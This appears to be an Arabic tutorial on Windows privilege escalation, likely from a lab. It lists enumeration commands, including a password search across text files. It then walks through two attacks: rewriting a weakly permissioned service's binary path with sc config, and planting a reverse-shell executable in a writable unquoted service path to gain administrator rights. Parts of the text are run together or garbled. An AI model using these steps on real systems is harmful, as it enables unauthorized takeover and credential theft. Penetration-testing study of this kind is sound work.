
دليلي العملي لمفاهيم تصعيد الامتيازات في ويندوز. تأكد من الاطلاع على قائمة التشغيل الخاصة بي، الرابط: https://www.youtube.com/playlist?list=PLlrnAg4kKF3puXLI0JyltbNJOC2R2HVFk
نقطة مهمة جديرة بالملاحظة وهي المجموعات، أي مستخدم ضمن مجموعة المسؤولين يساعدنا على تصعيد الصلاحيات!
whoami /priv - صلاحيات المستخدم الحاليnet users - يسرد جميع المستخدمينnet user <username> - يسرد تفاصيل مستخدم معينqwinsta - المستخدمون الآخرون المسجلون دخولهم في نفس الوقتnet localgroup - المجموعات المتوفرة في النظامnet localgroup <group-name> - يسرد أعضاء مجموعة معينةsysteminfo - يعطي كل المعلومات حول نظام التشغيلhostname - اسم المضيف للنظامfindstr /si password *.txt - نبحث عن الملفات التي تحتوي على 'password' وتحديدًا في الملفات النصيةwmic qfe get Caption,Description,HotFixID,InstalledOn - يخبرنا عن التصحيحات الأمنية والمعلومات ذات الصلةnetstat -ano - الاتصالات المرتبطة بالجهازschtasks /query /fo LIST /v - للبحث عن أي مهام مجدولةdriverquery - يسرد المعلومات المتعلقة بالتعريفاتsc query windefend - يبحث عن خدمة برنامج مكافحة الفيروساتsysteminfo على جهازك وهذا هو المطلب الوحيد لهذه الأداةwmic product get name,version,vendor - يعطي اسم المنتج والإصدار والبائع. هذا الأمر بالتحديد يعطي تصورًا واضحًا لما نحتاجه.wmic service list brief | findstr "Running" ومن أجل الحصول على مزيد من المعلومات حول الخدمة استخدم sc qc <ServiceName>post/multi/recon/local_exploit_suggester، تأكد من أن جلستك في الخلفية حتى تعمل هذه الأداة بشكل صحيح، أو يمكنك ببساطة تحميلها من meterpreter.winpeas.exe --helpsysteminfo وانسخ ذلك إلى أي ملف وسمِّه بالامتداد .txtهنا سنحاول تحديد الخدمات التي تمتلك صلاحيات غير آمنة ثم يمكننا محاولة استغلالها.
هنا يمكننا استخدام الأمر winpeas.exe servicesinfo ويمكننا رؤية الخدمات المفيدة جدًا
أحد الأجزاء المثيرة للاهتمام في المخرجات هو كما يلي،```
daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped YOU CAN MODIFY THIS SERVICE: ChangeConfig
- لكن للحصول على مزيد من المعلومات يمكننا استخدام أداة تسمى **accesschk** وهي من إنتاج مايكروسوفت، قم بتشغيلها على النحو التالي `accesschk.exe /accepteula -uwcqv <current-user> <service>`، الناتج هو،```
C:\PrivEsc>accesschk.exe /accepteula -uwcqv user daclsvc
daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
service_change_config حيث يمكننا تغيير إعدادات الخدمة.sc qc <service> ثم لاحظ Binary_path_name (يمكن أيضًا تسميته binpath)، الذي سنقوم بتغييره (ابتسامة شريرة)sc config <service> <option>="<value>"sc config daclsvc binpath="<path>" ثم ابدأ الخدمة sc start daclsvcVulnerable Service: C:\Program Files\Ignite Data\Vuln Service\file.exe
The system will read this path in the following sequence from 1 to 4 to trigger malicous.exe through a writeable directory.
C:\Program.exe C:\Program Files\Ignite.exe C:\Program Files\Ignite Data\Vuln.exe C:\Program Files\Ignite Data\Vuln Service\file.exe
- للحصول على مزيد من المعلومات، ما عليك سوى استخدام سكربت **WinPEAS** مع الخيار `servicesinfo`، وهنا يمكننا رؤية معلومات حول ما إذا كان يمكننا استغلال أي **Unquoted Service Path**. لقد قمت بتشغيل الأداة وكان الجزء المثير للاهتمام من المخرجات كما يلي،```
unquotedsvc(Unquoted Path Service)[C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe] - Manual - Stopped - No quotes and Space detected
sc qc <service>C:\Program Files\Unquoted Path Service باستخدام accesschk، لذا قم بتشغيل accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service". الإخراج:```
accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service"
C:\Program Files\Unquoted Path Service
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
RW NT SERVICE\TrustedInstaller
RW NT AUTHORITY\SYSTEM
RW BUILTIN\Administrators- لدينا إذن القراءة والكتابة.
- الآن سننشئ الحمولة ونلصقها في `C:\Program Files\Unquoted Path Service`، عبر `copy reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"`، هنا أستخدم اسمًا مختلفًا له ميزة تتعلق بالترتيب الأبجدي أيضًا.
- الآن ابدأ الخدمة، `sc start unquotedsvc`، نحن مسؤولون!!!